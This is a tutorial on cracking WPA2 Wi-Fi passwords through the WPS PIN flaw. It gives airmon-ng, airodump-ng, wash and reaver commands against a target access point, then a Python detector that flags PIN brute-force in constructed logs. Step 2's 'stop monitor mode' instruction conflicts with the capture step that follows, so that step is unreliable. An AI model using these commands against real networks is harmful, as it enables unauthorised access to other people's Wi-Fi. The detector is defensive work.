A flaw in a feature added to Wi-Fi, called Wi-Fi Protected Setup (WPS), allows WPA and WPA2 security to be bypassed and effectively broken in many situations. Many access points have Wi-Fi Protected Setup enabled by default (even after a hard reset of the access point).
- Wireless card (supporting promiscuous mode)
- Access point with WPA2 and WPS enabled
Steps to crack the Wi-Fi WPA2 password:
1. Open your terminal (CTRL+ALT+T) and type airmon-ng.
2. Next, stop our wireless monitor mode by running airmon-ng stop wlan0.
3. Now we are ready to capture the wireless traffic around us. Running airodump-ng wlan0 makes your wireless interface start capturing data.
4. From step 3 above, we can find an access point using the WPA2 encryption algorithm and note the AP channel number. Now we will find out whether the target AP has WPS enabled or not. Type wash -i wlan0 -c 8 -C -s. If the WPS Locked status is No, then we are ready to crack and move to step 5.
5. The last step is cracking the WPA2 password using reaver: reaver -i <interface> -b <BSSID> --fail-wait=360
It will take a few minutes to crack the password. The duration depends on the hardware and the wireless card.
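The attack above works by submitting WPS PIN guesses to the access point until one is accepted, which is why the "WPS Locked" status in step 4 matters: an AP that locks WPS after repeated failures slows the attack down, and an AP with WPS disabled is not exposed to it at all. The following is an added example, not part of the original tutorial or of the reaver/wash projects, showing what the defending side of this looks like: a small detector that reads an access point's WPS log lines and flags any station that accumulates many WPS NACK (rejected PIN) results in a short window. The log format, the hostname field and the sample lines are constructed for this example and are not hostapd's or any vendor's real output; adapt the regular expression to the log source you actually have.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (assumed format, not real hostapd output): one line
# per WPS (EAP-WSC) session, with the station MAC and the outcome.
SAMPLE_LOG = """\
2024-05-01 10:00:01 ap wps: EAP-WSC session from 02:11:22:33:44:55 result=NACK phase=M4
2024-05-01 10:00:04 ap wps: EAP-WSC session from 02:11:22:33:44:55 result=NACK phase=M4
2024-05-01 10:00:07 ap wps: EAP-WSC session from 02:11:22:33:44:55 result=NACK phase=M4
2024-05-01 10:00:10 ap wps: EAP-WSC session from 02:11:22:33:44:55 result=NACK phase=M4
2024-05-01 10:00:13 ap wps: EAP-WSC session from 02:11:22:33:44:55 result=NACK phase=M6
2024-05-01 10:00:16 ap wps: EAP-WSC session from 02:11:22:33:44:55 result=NACK phase=M4
2024-05-01 10:05:00 ap wps: EAP-WSC session from aa:bb:cc:dd:ee:ff result=NACK phase=M4
2024-05-01 10:30:00 ap wps: EAP-WSC session from aa:bb:cc:dd:ee:ff result=SUCCESS phase=M8
"""

# Regular expression for the constructed format above.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \S+ wps: EAP-WSC session from "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2}) result=(?P<result>\w+) phase=(?P<phase>M\d)$"
)


def parse_log(text):
    """Parse log text into (timestamp, station_mac, result, phase) tuples.

    Lines that do not match the expected format are skipped rather than
    raising, so a mixed log file can be fed in as-is.
    """
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        events.append((ts, m["mac"], m["result"], m["phase"]))
    return events


def find_pin_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Return {station_mac: max_failures_in_window} for stations whose WPS
    NACK count reaches `threshold` inside any sliding `window`.

    A legitimate user mistyping a PIN produces one or two NACKs; a PIN
    brute-force produces a steady stream of them from one MAC.
    """
    failures = defaultdict(list)
    for ts, mac, result, _phase in events:
        if result == "NACK":
            failures[mac].append(ts)

    alerts = {}
    for mac, times in failures.items():
        times.sort()
        start = 0
        peak = 0
        # Sliding window: advance `start` until the window fits, then record
        # the largest number of failures seen inside any single window.
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[mac] = peak
    return alerts


if __name__ == "__main__":
    for mac, count in find_pin_bruteforce(parse_log(SAMPLE_LOG)).items():
        print(f"possible WPS PIN brute-force from {mac}: {count} NACKs within 60s")
```

With the sample log, the first station triggers an alert (six NACKs within fifteen seconds) while the second does not (a single NACK followed by a success is ordinary user behaviour). On a real AP the response to such an alert is to confirm the WPS lockdown engaged, or better, to disable WPS entirely, since the lockdown only slows the attack rather than removing it.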